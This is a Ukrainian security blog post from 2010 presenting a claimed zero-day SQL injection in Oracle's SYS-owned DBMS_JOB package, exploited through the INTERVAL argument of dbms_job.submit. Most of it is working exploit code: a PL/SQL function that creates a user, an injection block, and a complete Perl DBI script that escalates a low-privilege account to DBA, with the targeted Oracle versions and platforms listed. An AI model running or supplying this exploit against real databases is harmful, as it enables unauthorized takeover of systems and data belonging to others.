Ukrainian Security Community – Блог спеціалістів з безпеки веб-додатків

Home > Вразливості \ vulnerabilities, Експлоіти/Exploits > TARGET: ORACLE. 0day експлойт

TARGET: ORACLE. 0day експлойт

April 12th, 2010 dsu Leave a comment Go to comments

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.
... 30 CUR := DBMS_SQL.OPEN_CURSOR; 31 BEGIN 32 33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL || 34 ' from dual', DBMS_SQL.NATIVE ); ...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо комусь і буде потрібно. Але щоб довести справу до переможного кінця, знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.
... 134 MYDATE: = FIND_DATE (INTERVAL); 135 IF NOT NO_PARSE THEN 136 PARSE_JOB (WHAT); 137 END IF; 138 ...
Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.
CREATE OR REPLACE FUNCTION fff return varchar2 authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'create user fff identified by fff'; COMMIT; RETURN 'sys'; END; /
Ну і власне сам експлойт (під катом):
DECLARE jobNo BINARY_INTEGER; BEGIN jobNo: = 4242; dbms_job.submit (jobNo, 'do_job;', TRUNC (SYSDATE + (1 / 24), 'HH'), 'TRUNC (SYSDATE + (30/24/60),''MI'') from dual where chr (115) = sys.fff () --'); END;
DB Version: Oracle XE, Oracle 10gR2 (можливо і більш ранні)
OS: Win XP SP3, Solaris (тестувалося тільки на цьому).
Експлойт на Perl:

#!/usr/bin/perl
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
print <<"USAGE";

Syntax: $0 -h  -s  -u  -p
[-P
]

Options:
-h          target server address
-s           target sid name
-u          user
-p
password

[-P
Oracle port]

USAGE
exit 0
}

my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};

my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

my $sqlcmd = "GRANT DBA TO $user";

print "[-] Creating function...\n";
$dbh->do( qq{
CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
COMMIT;
RETURN 'sys';
END;
} );

print "[-] Go...\n";
my $sth = $dbh->prepare( qq{
DECLARE
jobNo BINARY_INTEGER;
BEGIN
jobNo:=4242;
dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
END;});
$sth->execute;
$sth->finish;
print "[-] Executed\n";
$dbh->disconnect;
exit;